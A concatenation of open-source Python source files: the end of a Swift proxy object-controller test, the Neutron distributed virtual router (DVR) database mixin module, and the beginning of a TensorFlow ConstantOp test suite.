resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
self.assertEquals(req.environ.get('swift.log_info'), None)
@patch_policies([
    StoragePolicy(0, 'zero', True),
    StoragePolicy(1, 'one'),
    StoragePolicy(2, 'two'),
])
class TestObjControllerLegacyCache(TestObjController):
    """
    This test pretends like memcache returned a stored value that should
    resemble whatever "old" format. It catches KeyErrors you'd get if your
    code was expecting some new format during a rolling upgrade.
    """
    # Deliberately omits newer keys such as 'partition', 'nodes' and
    # 'storage_policy' to emulate a pre-upgrade cached entry; the entire
    # TestObjController suite is re-run against this stripped dict.
    container_info = {
        'read_acl': None,
        'write_acl': None,
        'sync_key': None,
        'versions': None,
    }
if __name__ == '__main__':
    # Allow running this module directly as a test script.
    unittest.main()
| dpgoetz/swift | test/unit/proxy/controllers/test_obj.py | Python | apache-2.0 | 33,082 |
# Copyright (c) 2014 OpenStack Foundation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
import six
from neutron.api.v2 import attributes
from neutron.callbacks import events
from neutron.callbacks import exceptions
from neutron.callbacks import registry
from neutron.callbacks import resources
from neutron.common import constants as l3_const
from neutron.common import exceptions as n_exc
from neutron.common import utils as n_utils
from neutron.db import l3_attrs_db
from neutron.db import l3_db
from neutron.db import l3_dvrscheduler_db as l3_dvrsched_db
from neutron.db import models_v2
from neutron.extensions import l3
from neutron.extensions import portbindings
from neutron.i18n import _LI
from neutron import manager
from neutron.plugins.common import constants
from neutron.plugins.common import utils as p_utils
LOG = logging.getLogger(__name__)
router_distributed_opts = [
cfg.BoolOpt('router_distributed',
default=False,
help=_("System-wide flag to determine the type of router "
"that tenants can create. Only admin can override.")),
]
cfg.CONF.register_opts(router_distributed_opts)
class L3_NAT_with_dvr_db_mixin(l3_db.L3_NAT_db_mixin,
l3_attrs_db.ExtraAttributesMixin):
"""Mixin class to enable DVR support."""
router_device_owners = (
l3_db.L3_NAT_db_mixin.router_device_owners +
(l3_const.DEVICE_OWNER_DVR_INTERFACE,
l3_const.DEVICE_OWNER_ROUTER_SNAT,
l3_const.DEVICE_OWNER_AGENT_GW))
extra_attributes = (
l3_attrs_db.ExtraAttributesMixin.extra_attributes + [{
'name': "distributed",
'default': cfg.CONF.router_distributed
}])
def _create_router_db(self, context, router, tenant_id):
"""Create a router db object with dvr additions."""
router['distributed'] = is_distributed_router(router)
with context.session.begin(subtransactions=True):
router_db = super(
L3_NAT_with_dvr_db_mixin, self)._create_router_db(
context, router, tenant_id)
self._process_extra_attr_router_create(context, router_db, router)
return router_db
    def _validate_router_migration(self, context, router_db, router_res):
        """Allow centralized -> distributed state transition only."""
        if (router_db.extra_attributes.distributed and
            router_res.get('distributed') is False):
            # Downgrading a DVR router back to centralized is unsupported.
            LOG.info(_LI("Centralizing distributed router %s "
                         "is not supported"), router_db['id'])
            raise n_exc.NotSupported(msg=_("Migration from distributed router "
                                           "to centralized"))
        elif (not router_db.extra_attributes.distributed and
              router_res.get('distributed')):
            # router should be disabled in order for upgrade
            if router_db.admin_state_up:
                msg = _('Cannot upgrade active router to distributed. Please '
                        'set router admin_state_up to False prior to upgrade.')
                raise n_exc.BadRequest(resource='router', msg=msg)
            # Notify advanced services of the imminent state transition
            # for the router.
            try:
                kwargs = {'context': context, 'router': router_db}
                registry.notify(
                    resources.ROUTER, events.BEFORE_UPDATE, self, **kwargs)
            except exceptions.CallbackFailure as e:
                with excutils.save_and_reraise_exception():
                    # NOTE(armax): preserve old check's behavior
                    if len(e.errors) == 1:
                        raise e.errors[0].error
                    raise l3.RouterInUse(router_id=router_db['id'],
                                         reason=e)
def _update_distributed_attr(
self, context, router_id, router_db, data, gw_info):
"""Update the model to support the dvr case of a router."""
if data.get('distributed'):
old_owner = l3_const.DEVICE_OWNER_ROUTER_INTF
new_owner = l3_const.DEVICE_OWNER_DVR_INTERFACE
for rp in router_db.attached_ports.filter_by(port_type=old_owner):
rp.port_type = new_owner
rp.port.device_owner = new_owner
    def _update_router_db(self, context, router_id, data, gw_info):
        """Update a router, handling a legacy -> DVR migration if requested."""
        with context.session.begin(subtransactions=True):
            router_db = super(
                L3_NAT_with_dvr_db_mixin, self)._update_router_db(
                context, router_id, data, gw_info)
            # Capture the migration decision before extra_attributes is
            # overwritten with the new data below.
            migrating_to_distributed = (
                not router_db.extra_attributes.distributed and
                data.get('distributed') is True)
            self._validate_router_migration(context, router_db, data)
            router_db.extra_attributes.update(data)
            self._update_distributed_attr(
                context, router_id, router_db, data, gw_info)
            if migrating_to_distributed:
                if router_db['gw_port_id']:
                    # If the Legacy router is getting migrated to a DVR
                    # router, make sure to create corresponding
                    # snat interface ports that are to be consumed by
                    # the Service Node.
                    if not self._create_snat_intf_ports_if_not_exists(
                            context.elevated(), router_db):
                        LOG.debug("SNAT interface ports not created: %s",
                                  router_db['id'])
                # Unbind the router from its current agents so the
                # scheduler can re-bind it as a distributed router.
                cur_agents = self.list_l3_agents_hosting_router(
                    context, router_db['id'])['agents']
                for agent in cur_agents:
                    self._unbind_router(context, router_db['id'],
                                        agent['id'])
            return router_db
    def _delete_current_gw_port(self, context, router_id, router, new_network):
        """
        Overriden here to handle deletion of dvr internal ports.

        If there is a valid router update with gateway port to be deleted,
        then go ahead and delete the csnat ports and the floatingip
        agent gateway port associated with the dvr router.
        """
        # Remember the old external network before the base class drops
        # the gateway port.
        gw_ext_net_id = (
            router.gw_port['network_id'] if router.gw_port else None)

        super(L3_NAT_with_dvr_db_mixin,
              self)._delete_current_gw_port(context, router_id,
                                            router, new_network)
        if (is_distributed_router(router) and
                gw_ext_net_id != new_network):
            self.delete_csnat_router_interface_ports(
                context.elevated(), router)
            # NOTE(Swami): Delete the Floatingip agent gateway port
            # on all hosts when it is the last gateway port in the
            # given external network.
            filters = {'network_id': [gw_ext_net_id],
                       'device_owner': [l3_const.DEVICE_OWNER_ROUTER_GW]}
            ext_net_gw_ports = self._core_plugin.get_ports(
                context.elevated(), filters)
            if not ext_net_gw_ports:
                self.delete_floatingip_agent_gateway_port(
                    context.elevated(), None, gw_ext_net_id)
    def _create_gw_port(self, context, router_id, router, new_network,
                        ext_ips):
        """Create the gateway port and, for DVR, its SNAT interface ports."""
        super(L3_NAT_with_dvr_db_mixin,
              self)._create_gw_port(context, router_id, router, new_network,
                                    ext_ips)
        # Make sure that the gateway port exists before creating the
        # snat interface ports for distributed router.
        if router.extra_attributes.distributed and router.gw_port:
            snat_p_list = self._create_snat_intf_ports_if_not_exists(
                context.elevated(), router)
            if not snat_p_list:
                LOG.debug("SNAT interface ports not created: %s", snat_p_list)
def _get_device_owner(self, context, router=None):
"""Get device_owner for the specified router."""
router_is_uuid = isinstance(router, six.string_types)
if router_is_uuid:
router = self._get_router(context, router)
if is_distributed_router(router):
return l3_const.DEVICE_OWNER_DVR_INTERFACE
return super(L3_NAT_with_dvr_db_mixin,
self)._get_device_owner(context, router)
    def _get_interface_ports_for_network(self, context, network_id):
        """Return a query of RouterPort rows for router interfaces on
        the given network (both legacy and DVR interface owners).
        """
        router_intf_qry = context.session.query(l3_db.RouterPort)
        router_intf_qry = router_intf_qry.join(models_v2.Port)
        return router_intf_qry.filter(
            models_v2.Port.network_id == network_id,
            l3_db.RouterPort.port_type.in_(l3_const.ROUTER_INTERFACE_OWNERS)
        )
    def _update_fip_assoc(self, context, fip, floatingip_db, external_port):
        """Override to create floating agent gw port for DVR.

        Floating IP Agent gateway port will be created when a
        floatingIP association happens.
        """
        fip_port = fip.get('port_id')
        super(L3_NAT_with_dvr_db_mixin, self)._update_fip_assoc(
            context, fip, floatingip_db, external_port)
        associate_fip = fip_port and floatingip_db['id']
        if associate_fip and floatingip_db.get('router_id'):
            admin_ctx = context.elevated()
            router_dict = self.get_router(
                admin_ctx, floatingip_db['router_id'])
            # Check if distributed router and then create the
            # FloatingIP agent gateway port
            if router_dict.get('distributed'):
                vm_hostid = self._get_vm_port_hostid(
                    context, fip_port)
                if vm_hostid:
                    # FIXME (Swami): This FIP Agent Gateway port should be
                    # created only once and there should not be a duplicate
                    # for the same host. Until we find a good solution for
                    # augmenting multiple server requests we should use the
                    # existing flow.
                    fip_agent_port = (
                        self.create_fip_agent_gw_port_if_not_exists(
                            admin_ctx, external_port['network_id'],
                            vm_hostid))
                    LOG.debug("FIP Agent gateway port: %s", fip_agent_port)
def _get_floatingip_on_port(self, context, port_id=None):
"""Helper function to retrieve the fip associated with port."""
fip_qry = context.session.query(l3_db.FloatingIP)
floating_ip = fip_qry.filter_by(fixed_port_id=port_id)
return floating_ip.first()
    def add_router_interface(self, context, router_id, interface_info):
        """Attach an interface (by port or subnet) to a router.

        For a distributed router with a gateway, also creates the matching
        csnat interface port, rolling back the new port on failure.
        """
        add_by_port, add_by_sub = self._validate_interface_info(interface_info)
        router = self._get_router(context, router_id)
        device_owner = self._get_device_owner(context, router)

        # This should be True unless adding an IPv6 prefix to an existing port
        new_port = True

        if add_by_port:
            port, subnets = self._add_interface_by_port(
                context, router, interface_info['port_id'], device_owner)
        elif add_by_sub:
            port, subnets, new_port = self._add_interface_by_subnet(
                context, router, interface_info['subnet_id'], device_owner)

        if new_port:
            if router.extra_attributes.distributed and router.gw_port:
                try:
                    admin_context = context.elevated()
                    self._add_csnat_router_interface_port(
                        admin_context, router, port['network_id'],
                        port['fixed_ips'][-1]['subnet_id'])
                except Exception:
                    with excutils.save_and_reraise_exception():
                        # we need to preserve the original state prior
                        # the request by rolling back the port creation
                        # that led to new_port=True
                        self._core_plugin.delete_port(
                            admin_context, port['id'])

            with context.session.begin(subtransactions=True):
                router_port = l3_db.RouterPort(
                    port_id=port['id'],
                    router_id=router.id,
                    port_type=device_owner
                )
                context.session.add(router_port)

        router_interface_info = self._make_router_interface_info(
            router_id, port['tenant_id'], port['id'], subnets[-1]['id'],
            [subnet['id'] for subnet in subnets])
        self.notify_router_interface_action(
            context, router_interface_info, 'add')
        return router_interface_info
def _port_has_ipv6_address(self, port):
"""Overridden to return False if DVR SNAT port."""
if port['device_owner'] == l3_const.DEVICE_OWNER_ROUTER_SNAT:
return False
return super(L3_NAT_with_dvr_db_mixin,
self)._port_has_ipv6_address(port)
    def _check_dvr_router_remove_required_and_notify_agent(
            self, context, router, port, subnets):
        """Clean up DVR artifacts after an interface removal and notify.

        Deletes the csnat port for the removed subnet, unbinds the router
        from agents whose host no longer has DVR-serviced ports, then sends
        the 'remove' interface notification.
        """
        if router.extra_attributes.distributed:
            if router.gw_port and subnets[0]['id']:
                self.delete_csnat_router_interface_ports(
                    context.elevated(), router, subnet_id=subnets[0]['id'])
            plugin = manager.NeutronManager.get_service_plugins().get(
                constants.L3_ROUTER_NAT)
            l3_agents = plugin.get_l3_agents_hosting_routers(context,
                                                             [router['id']])
            for l3_agent in l3_agents:
                # Drop the binding when no relevant ports remain on the
                # agent's host.
                if not plugin.check_ports_exist_on_l3agent(context, l3_agent,
                                                           router['id']):
                    plugin.remove_router_from_l3_agent(
                        context, l3_agent['id'], router['id'])
        router_interface_info = self._make_router_interface_info(
            router['id'], port['tenant_id'], port['id'], subnets[0]['id'],
            [subnet['id'] for subnet in subnets])
        self.notify_router_interface_action(
            context, router_interface_info, 'remove')
        return router_interface_info
    def remove_router_interface(self, context, router_id, interface_info):
        """Detach an interface (by port or subnet) from a router."""
        remove_by_port, remove_by_subnet = (
            self._validate_interface_info(interface_info, for_removal=True)
        )
        port_id = interface_info.get('port_id')
        subnet_id = interface_info.get('subnet_id')
        router = self._get_router(context, router_id)
        device_owner = self._get_device_owner(context, router)

        if remove_by_port:
            port, subnets = self._remove_interface_by_port(
                context, router_id, port_id, subnet_id, device_owner)

        # remove_by_subnet is not used here, because the validation logic of
        # _validate_interface_info ensures that at least one of remote_by_*
        # is True.
        else:
            port, subnets = self._remove_interface_by_subnet(
                context, router_id, subnet_id, device_owner)

        router_interface_info = (
            self._check_dvr_router_remove_required_and_notify_agent(
                context, router, port, subnets))
        return router_interface_info
    def _get_snat_sync_interfaces(self, context, router_ids):
        """Query router interfaces that relate to list of router_ids."""
        if not router_ids:
            return []
        qry = context.session.query(l3_db.RouterPort)
        qry = qry.filter(
            l3_db.RouterPort.router_id.in_(router_ids),
            l3_db.RouterPort.port_type == l3_const.DEVICE_OWNER_ROUTER_SNAT
        )
        # NOTE(review): returns a dict of router_id -> [port dicts] when
        # router_ids is non-empty, but a list ([]) otherwise — callers
        # appear to only index it when routers exist.
        interfaces = collections.defaultdict(list)
        for rp in qry:
            interfaces[rp.router_id].append(
                self._core_plugin._make_port_dict(rp.port, None))
        LOG.debug("Return the SNAT ports: %s", interfaces)
        return interfaces
    def _build_routers_list(self, context, routers, gw_ports):
        """Attach gw_port info and the SNAT-hosting agent host to routers."""
        # Perform a single query up front for all routers
        if not routers:
            return []
        router_ids = [r['id'] for r in routers]
        snat_binding = l3_dvrsched_db.CentralizedSnatL3AgentBinding
        query = (context.session.query(snat_binding).
                 filter(snat_binding.router_id.in_(router_ids))).all()
        bindings = dict((b.router_id, b) for b in query)

        for rtr in routers:
            gw_port_id = rtr['gw_port_id']
            # Collect gw ports only if available
            if gw_port_id and gw_ports.get(gw_port_id):
                rtr['gw_port'] = gw_ports[gw_port_id]
                if 'enable_snat' in rtr[l3.EXTERNAL_GW_INFO]:
                    rtr['enable_snat'] = (
                        rtr[l3.EXTERNAL_GW_INFO]['enable_snat'])

                binding = bindings.get(rtr['id'])
                if not binding:
                    # No centralized SNAT binding yet for this router.
                    rtr['gw_port_host'] = None
                    LOG.debug('No snat is bound to router %s', rtr['id'])
                    continue

                rtr['gw_port_host'] = binding.l3_agent.host

        return routers
    def _process_routers(self, context, routers):
        """Index routers by id, attaching their SNAT interface ports."""
        routers_dict = {}
        snat_intfs_by_router_id = self._get_snat_sync_interfaces(
            context, [r['id'] for r in routers])
        for router in routers:
            routers_dict[router['id']] = router
            # Only routers with a gateway have SNAT interface ports.
            if router['gw_port_id']:
                snat_router_intfs = snat_intfs_by_router_id[router['id']]
                LOG.debug("SNAT ports returned: %s ", snat_router_intfs)
                router[l3_const.SNAT_ROUTER_INTF_KEY] = snat_router_intfs
        return routers_dict
    def _process_floating_ips_dvr(self, context, routers_dict,
                                  floating_ips, host, agent):
        """Attach host-relevant floating IPs and FIP agent ports to routers."""
        fip_sync_interfaces = None
        LOG.debug("FIP Agent : %s ", agent.id)
        for floating_ip in floating_ips:
            router = routers_dict.get(floating_ip['router_id'])
            if router:
                router_floatingips = router.get(l3_const.FLOATINGIP_KEY, [])
                if router['distributed']:
                    # For DVR only hand out FIPs hosted on this agent's host.
                    if floating_ip.get('host', None) != host:
                        continue
                    LOG.debug("Floating IP host: %s", floating_ip['host'])
                router_floatingips.append(floating_ip)
                router[l3_const.FLOATINGIP_KEY] = router_floatingips
                # Lazily fetch the agent's FIP gateway ports just once.
                if not fip_sync_interfaces:
                    fip_sync_interfaces = self._get_fip_sync_interfaces(
                        context, agent.id)
                    LOG.debug("FIP Agent ports: %s", fip_sync_interfaces)
                router[l3_const.FLOATINGIP_AGENT_INTF_KEY] = (
                    fip_sync_interfaces)
    def _get_fip_sync_interfaces(self, context, fip_agent_id):
        """Return the FIP agent gateway ports owned by fip_agent_id."""
        if not fip_agent_id:
            return []
        filters = {'device_id': [fip_agent_id],
                   'device_owner': [l3_const.DEVICE_OWNER_AGENT_GW]}
        interfaces = self._core_plugin.get_ports(context.elevated(), filters)
        LOG.debug("Return the FIP ports: %s ", interfaces)
        return interfaces
    def _get_dvr_sync_data(self, context, host, agent, router_ids=None,
                           active=None):
        """Build the router sync payload for the L3 agent on ``host``."""
        routers, interfaces, floating_ips = self._get_router_info_list(
            context, router_ids=router_ids, active=active,
            device_owners=l3_const.ROUTER_INTERFACE_OWNERS)
        port_filter = {portbindings.HOST_ID: [host]}
        ports = self._core_plugin.get_ports(context, port_filter)
        port_dict = dict((port['id'], port) for port in ports)
        # Add the port binding host to the floatingip dictionary
        for fip in floating_ips:
            vm_port = port_dict.get(fip['port_id'], None)
            if vm_port:
                fip['host'] = self._get_vm_port_hostid(context, fip['port_id'],
                                                       port=vm_port)
        routers_dict = self._process_routers(context, routers)
        self._process_floating_ips_dvr(context, routers_dict,
                                       floating_ips, host, agent)
        # Gather every port that needs subnet details populated: gateway
        # ports, FIP agent gateway ports, SNAT ports and router interfaces.
        ports_to_populate = []
        for router in routers_dict.values():
            if router.get('gw_port'):
                ports_to_populate.append(router['gw_port'])
            if router.get(l3_const.FLOATINGIP_AGENT_INTF_KEY):
                ports_to_populate += router[l3_const.FLOATINGIP_AGENT_INTF_KEY]
            if router.get(l3_const.SNAT_ROUTER_INTF_KEY):
                ports_to_populate += router[l3_const.SNAT_ROUTER_INTF_KEY]
        ports_to_populate += interfaces
        self._populate_subnets_for_ports(context, ports_to_populate)
        self._process_interfaces(routers_dict, interfaces)
        return list(routers_dict.values())
    def _get_vm_port_hostid(self, context, port_id, port=None):
        """Return the portbinding host_id."""
        vm_port_db = port or self._core_plugin.get_port(context, port_id)
        device_owner = vm_port_db['device_owner'] if vm_port_db else ""
        # Only DVR-serviced ports and agent gateway ports have a meaningful
        # binding host; other owners fall through and return None implicitly.
        if (n_utils.is_dvr_serviced(device_owner) or
                device_owner == l3_const.DEVICE_OWNER_AGENT_GW):
            return vm_port_db[portbindings.HOST_ID]
def _get_agent_gw_ports_exist_for_network(
self, context, network_id, host, agent_id):
"""Return agent gw port if exist, or None otherwise."""
if not network_id:
LOG.debug("Network not specified")
return
filters = {
'network_id': [network_id],
'device_id': [agent_id],
'device_owner': [l3_const.DEVICE_OWNER_AGENT_GW]
}
ports = self._core_plugin.get_ports(context, filters)
if ports:
return ports[0]
def _get_router_ids(self, context):
"""Function to retrieve router IDs for a context without joins"""
query = self._model_query(context, l3_db.Router.id)
return [row[0] for row in query]
    def delete_floatingip_agent_gateway_port(
            self, context, host_id, ext_net_id):
        """Function to delete FIP gateway port with given ext_net_id.

        A falsy ``host_id`` deletes the agent gateway port on every host;
        a specific ``host_id`` deletes only that host's port.
        """
        # delete any fip agent gw port
        device_filter = {'device_owner': [l3_const.DEVICE_OWNER_AGENT_GW],
                         'network_id': [ext_net_id]}
        ports = self._core_plugin.get_ports(context,
                                            filters=device_filter)
        for p in ports:
            if not host_id or p[portbindings.HOST_ID] == host_id:
                self._core_plugin.ipam.delete_port(context, p['id'])
                # A given host has at most one such port, so stop early.
                if host_id:
                    return
    def create_fip_agent_gw_port_if_not_exists(
            self, context, network_id, host):
        """Function to return the FIP Agent GW port.

        This function will create a FIP Agent GW port
        if required. If the port already exists, it
        will return the existing port and will not
        create a new one.

        Raises BadRequest if port creation fails; implicitly returns None
        when no L3 agent is registered on ``host``.
        """
        l3_agent_db = self._get_agent_by_type_and_host(
            context, l3_const.AGENT_TYPE_L3, host)
        if l3_agent_db:
            LOG.debug("Agent ID exists: %s", l3_agent_db['id'])
            f_port = self._get_agent_gw_ports_exist_for_network(
                context, network_id, host, l3_agent_db['id'])
            if not f_port:
                LOG.info(_LI('Agent Gateway port does not exist,'
                             ' so create one: %s'), f_port)
                port_data = {'tenant_id': '',
                             'network_id': network_id,
                             'device_id': l3_agent_db['id'],
                             'device_owner': l3_const.DEVICE_OWNER_AGENT_GW,
                             'binding:host_id': host,
                             'admin_state_up': True,
                             'name': ''}
                agent_port = p_utils.create_port(self._core_plugin, context,
                                                 {'port': port_data})
                if agent_port:
                    self._populate_subnets_for_ports(context, [agent_port])
                    return agent_port
                msg = _("Unable to create the Agent Gateway Port")
                raise n_exc.BadRequest(resource='router', msg=msg)
            else:
                self._populate_subnets_for_ports(context, [f_port])
                return f_port
def _get_snat_interface_ports_for_router(self, context, router_id):
"""Return all existing snat_router_interface ports."""
qry = context.session.query(l3_db.RouterPort)
qry = qry.filter_by(
router_id=router_id,
port_type=l3_const.DEVICE_OWNER_ROUTER_SNAT
)
ports = [self._core_plugin._make_port_dict(rp.port, None)
for rp in qry]
return ports
    def _add_csnat_router_interface_port(
            self, context, router, network_id, subnet_id, do_pop=True):
        """Add SNAT interface to the specified router and subnet."""
        port_data = {'tenant_id': '',
                     'network_id': network_id,
                     'fixed_ips': [{'subnet_id': subnet_id}],
                     'device_id': router.id,
                     'device_owner': l3_const.DEVICE_OWNER_ROUTER_SNAT,
                     'admin_state_up': True,
                     'name': ''}
        snat_port = p_utils.create_port(self._core_plugin, context,
                                        {'port': port_data})
        if not snat_port:
            msg = _("Unable to create the SNAT Interface Port")
            raise n_exc.BadRequest(resource='router', msg=msg)

        with context.session.begin(subtransactions=True):
            router_port = l3_db.RouterPort(
                port_id=snat_port['id'],
                router_id=router.id,
                port_type=l3_const.DEVICE_OWNER_ROUTER_SNAT
            )
            context.session.add(router_port)

        if do_pop:
            # NOTE(review): returns _populate_subnets_for_ports' result here
            # rather than the port itself — confirm callers expect this.
            return self._populate_subnets_for_ports(context, [snat_port])
        return snat_port
    def _create_snat_intf_ports_if_not_exists(self, context, router):
        """Function to return the snat interface port list.

        This function will return the snat interface port list
        if it exists. If the port does not exist it will create
        new ports and then return the list.
        """
        port_list = self._get_snat_interface_ports_for_router(
            context, router.id)
        if port_list:
            self._populate_subnets_for_ports(context, port_list)
            return port_list
        port_list = []

        # One csnat port is created per DVR-interface port with fixed IPs.
        int_ports = (
            rp.port for rp in
            router.attached_ports.filter_by(
                port_type=l3_const.DEVICE_OWNER_DVR_INTERFACE
            )
        )
        LOG.info(_LI('SNAT interface port list does not exist,'
                     ' so create one: %s'), port_list)
        for intf in int_ports:
            if intf.fixed_ips:
                # Passing the subnet for the port to make sure the IP's
                # are assigned on the right subnet if multiple subnet
                # exists
                snat_port = self._add_csnat_router_interface_port(
                    context, router, intf['network_id'],
                    intf['fixed_ips'][0]['subnet_id'], do_pop=False)
                port_list.append(snat_port)
        if port_list:
            self._populate_subnets_for_ports(context, port_list)
        return port_list
def dvr_vmarp_table_update(self, context, port_dict, action):
"""Notify L3 agents of VM ARP table changes.
When a VM goes up or down, look for one DVR router on the port's
subnet, and send the VM's ARP details to all L3 agents hosting the
router.
"""
# Check this is a valid VM or service port
if not (n_utils.is_dvr_serviced(port_dict['device_owner']) and
port_dict['fixed_ips']):
return
ip_address = port_dict['fixed_ips'][0]['ip_address']
subnet = port_dict['fixed_ips'][0]['subnet_id']
filters = {'fixed_ips': {'subnet_id': [subnet]}}
ports = self._core_plugin.get_ports(context, filters=filters)
for port in ports:
if port['device_owner'] == l3_const.DEVICE_OWNER_DVR_INTERFACE:
router_id = port['device_id']
router_dict = self._get_router(context, router_id)
if router_dict.extra_attributes.distributed:
arp_table = {'ip_address': ip_address,
'mac_address': port_dict['mac_address'],
'subnet_id': subnet}
if action == "add":
notify_action = self.l3_rpc_notifier.add_arp_entry
elif action == "del":
notify_action = self.l3_rpc_notifier.del_arp_entry
notify_action(context, router_id, arp_table)
return
    def delete_csnat_router_interface_ports(self, context,
                                            router, subnet_id=None):
        """Delete the router's csnat ports, optionally for one subnet only."""
        # Each csnat router interface port is associated
        # with a subnet, so we need to pass the subnet id to
        # delete the right ports.

        # TODO(markmcclain): This is suboptimal but was left to reduce
        # changeset size since it is late in cycle
        ports = (
            rp.port.id for rp in
            router.attached_ports.filter_by(
                port_type=l3_const.DEVICE_OWNER_ROUTER_SNAT)
            if rp.port
        )

        c_snat_ports = self._core_plugin.get_ports(
            context,
            filters={'id': ports}
        )
        for p in c_snat_ports:
            if subnet_id is None:
                # No subnet given: delete every csnat port of the router.
                self._core_plugin.delete_port(context,
                                              p['id'],
                                              l3_port_check=False)
            else:
                if p['fixed_ips'][0]['subnet_id'] == subnet_id:
                    LOG.debug("Subnet matches: %s", subnet_id)
                    self._core_plugin.delete_port(context,
                                                  p['id'],
                                                  l3_port_check=False)
def is_distributed_router(router):
    """Return True if router to be handled is distributed."""
    try:
        # DB objects expose the flag through extra_attributes.
        distributed = router.extra_attributes.distributed
    except AttributeError:
        # Otherwise assume a request body dict.
        distributed = router.get('distributed')
    if attributes.is_attr_set(distributed):
        return distributed
    # Fall back to the deployment-wide default.
    return cfg.CONF.router_distributed
| shahbazn/neutron | neutron/db/l3_dvr_db.py | Python | apache-2.0 | 31,701 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ConstantOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import array_ops
class ConstantTest(tf.test.TestCase):
  """Tests tf.constant / tf.convert_to_tensor across dtypes, shapes and
  size limits (2GB tensor proto / GraphDef caps)."""

  def _testCpu(self, x):
    # Round-trip x through convert_to_tensor on CPU and compare with numpy.
    np_ans = np.array(x)
    with self.test_session(use_gpu=False):
      tf_ans = tf.convert_to_tensor(x).eval()
    if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
      self.assertAllClose(np_ans, tf_ans)
    else:
      self.assertAllEqual(np_ans, tf_ans)

  def _testGpu(self, x):
    # Same round-trip but allowing GPU placement.
    np_ans = np.array(x)
    with self.test_session(use_gpu=True):
      tf_ans = tf.convert_to_tensor(x).eval()
    if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
      self.assertAllClose(np_ans, tf_ans)
    else:
      self.assertAllEqual(np_ans, tf_ans)

  def _testAll(self, x):
    self._testCpu(x)
    self._testGpu(x)

  def testFloat(self):
    self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
    self._testAll(
        np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float32))
    self._testAll(np.empty((2, 0, 5)).astype(np.float32))

  def testDouble(self):
    self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float64))
    self._testAll(
        np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float64))
    self._testAll(np.empty((2, 0, 5)).astype(np.float64))

  def testInt32(self):
    self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int32))
    self._testAll(
        (100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(np.int32))
    self._testAll(np.empty((2, 0, 5)).astype(np.int32))

  def testInt64(self):
    self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int64))
    self._testAll(
        (100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(np.int64))
    self._testAll(np.empty((2, 0, 5)).astype(np.int64))

  # NOTE(review): np.complex is a deprecated alias removed in NumPy >= 1.24;
  # on modern NumPy these two tests need the builtin complex(1, 2) instead.
  def testComplex64(self):
    self._testAll(
        np.complex(1, 2) * np.arange(-15, 15).reshape([2, 3, 5]).astype(
            np.complex64))
    self._testAll(np.complex(
        1, 2) * np.random.normal(size=30).reshape([2, 3, 5]).astype(
            np.complex64))
    self._testAll(np.empty((2, 0, 5)).astype(np.complex64))

  def testComplex128(self):
    self._testAll(
        np.complex(1, 2) * np.arange(-15, 15).reshape([2, 3, 5]).astype(
            np.complex128))
    self._testAll(np.complex(
        1, 2) * np.random.normal(size=30).reshape([2, 3, 5]).astype(
            np.complex128))
    self._testAll(np.empty((2, 0, 5)).astype(np.complex128))

  def testString(self):
    # Strings are CPU-only.
    self._testCpu(np.array([tf.compat.as_bytes(str(x))
                            for x in np.arange(-15, 15)]).reshape([2, 3, 5]))
    self._testCpu(np.empty((2, 0, 5)).astype(np.str_))

  def testStringWithNulls(self):
    # Embedded NUL bytes must survive the round trip intact.
    with self.test_session():
      val = tf.convert_to_tensor(b"\0\0\0\0").eval()
    self.assertEqual(len(val), 4)
    self.assertEqual(val, b"\0\0\0\0")

    with self.test_session():
      val = tf.convert_to_tensor(b"xx\0xx").eval()
    self.assertEqual(len(val), 5)
    self.assertAllEqual(val, b"xx\0xx")

    nested = [[b"\0\0\0\0", b"xx\0xx"], [b"\0_\0_\0_\0", b"\0"]]
    with self.test_session():
      val = tf.convert_to_tensor(nested).eval()
    # NOTE(mrry): Do not use assertAllEqual, because it converts nested to a
    # numpy array, which loses the null terminators.
    self.assertEqual(val.tolist(), nested)

  def testExplicitShapeNumPy(self):
    with tf.Graph().as_default():
      c = tf.constant(
          np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32),
          shape=[2, 3, 5])
    self.assertEqual(c.get_shape(), [2, 3, 5])

  def testImplicitShapeNumPy(self):
    with tf.Graph().as_default():
      c = tf.constant(
          np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
    self.assertEqual(c.get_shape(), [2, 3, 5])

  def testExplicitShapeList(self):
    with tf.Graph().as_default():
      c = tf.constant([1, 2, 3, 4, 5, 6, 7], shape=[7])
    self.assertEqual(c.get_shape(), [7])

  def testImplicitShapeList(self):
    with tf.Graph().as_default():
      c = tf.constant([1, 2, 3, 4, 5, 6, 7])
    self.assertEqual(c.get_shape(), [7])

  def testExplicitShapeNumber(self):
    with tf.Graph().as_default():
      c = tf.constant(1, shape=[1])
    self.assertEqual(c.get_shape(), [1])

  def testImplicitShapeNumber(self):
    with tf.Graph().as_default():
      c = tf.constant(1)
    self.assertEqual(c.get_shape(), [])

